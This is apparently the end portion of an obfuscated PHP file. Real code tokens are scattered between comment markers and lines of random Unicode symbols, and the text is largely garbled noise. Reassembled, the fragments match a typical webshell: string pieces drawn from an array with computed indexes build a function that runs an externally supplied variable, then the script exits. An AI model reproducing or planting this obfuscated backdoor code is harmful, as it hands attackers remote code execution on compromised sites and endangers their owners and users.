⑽㈧卍⓻◬⓲≜Ⅲ㈦➝㊔⋒∼ℑ┞﹎☂⊏∾⊥↞┢◶


%O^Oykug⑽㈧卍⓻◬⓲≜Ⅲ㈦➝㊔⋒∼ℑ┞﹎☂⊏∾⊥↞┢◶


-*///
[/*-`&O-*///
4+1/*-,y]!AWM-*///
]/*-=j-nI2-*///
);/*-n[<y753-*///
@$QXFKlu/*-
➎⚘㊦⇑⊊♚≒⒌↾〕┭☤╬❷ↆ
.VeL%o>PJX➎⚘㊦⇑⊊♚≒⒌↾〕┭☤╬❷ↆ
-*///
[/*-+!-_M~UjF-*///
0/*-dgig-*///
]/*-

―╈┱➮✿ⅰ¤㊒↾Σ∦⇆┿☚♗➧Φⅳ⋁∙

+―╈┱➮✿ⅰ¤㊒↾Σ∦⇆┿☚♗➧Φⅳ⋁∙

-*///
(/*-;wCsd_#6-*///
"",/*-


÷☝✽Ⓞ⏢Ⓘ⊏㊂❣≥ℕ⒄↧Ⓤ⒩∋⇞⇟


[D20lAsrn_÷☝✽Ⓞ⏢Ⓘ⊏㊂❣≥ℕ⒄↧Ⓤ⒩∋⇞⇟


-*///
 $QXFKlu/*-

Ⓝ➈

RkEⓃ➈

-*///
[/*-xy>_P-*///
5+2/*-muO[V-*///
] /*-?ED-*///
. /*-m,ku74W-*///
$QXFKlu/*-a--*///
[/*-


Ⅹ⊇⇑↸유ⓢ☞▀┑❸㊄∃≫▴✸╋≔⋯╩◄⇢┞↬☀∸㊦⊼


ulⅩ⊇⇑↸유ⓢ☞▀┑❸㊄∃≫▴✸╋≔⋯╩◄⇢┞↬☀∸㊦⊼


-*///
2+2/*-
》☋㊰✕℉⑰⇏
fDD]》☋㊰✕℉⑰⇏
-*///
]/*-
&❶⒨↯㍿↮Ⓘ⋛⑱┣☷㊎﹋◀☐♓⊚↊┌ⓙ∢△⇜
~.;&❶⒨↯㍿↮Ⓘ⋛⑱┣☷㊎﹋◀☐♓⊚↊┌ⓙ∢△⇜
-*///
(/*-iP%al-*///
$atYkuHBoc/*-MK7!{qs2b-*///
)/*-

⑻Ⓚ⒎♗ⓑ↡↪⒜◸큐㈣㊮✡⓺⒳

6WA|PB⑻Ⓚ⒎♗ⓑ↡↪⒜◸큐㈣㊮✡⓺⒳

-*///
 . /*-pk?r&f.3n-*///
$QXFKlu/*-
㊧☏◝❖✠➋≐⓰◵۰➣⋁∈︼┠
)=H㊧☏◝❖✠➋≐⓰◵۰➣⋁∈︼┠
-*///
[/*-

┨⊜

lr^q,┨⊜

-*///
4+4/*-Dcd-*///
]/*-%,w(>q-6-*///
);/*-X0l-*///
/*-$>y-*///
die;/*-


卐◠⇡☿ↇΦ✒➾⋘⒁›


{JYH{LG卐◠⇡☿ↇΦ✒➾⋘⒁›


-*///
 endif;/*-L`==YW,UJ-*///
 }/*-
Ⓝ⅒▅Ⅺ◄⋃↚┚✧♐
>hPⓃ⅒▅Ⅺ◄⋃↚┚✧♐
-*///
}/*-VI|S`,bJ-*///
amX/*-

⑴⒋⒦╆↱

bvra⑴⒋⒦╆↱

-*///
::/*-.]IQ_-*///
jzhF/*-

⋋⒗⇋∪╝┲∧⋍♞╇☩▎┷ℐ︹큐⊔⓯┠∫♬⊂▰⊟┾➵≚∊

05F{1-D^⋋⒗⇋∪╝┲∧⋍♞╇☩▎┷ℐ︹큐⊔⓯┠∫♬⊂▰⊟┾➵≚∊

-*///
();/*-HEmMy9I)L-*///
 ?>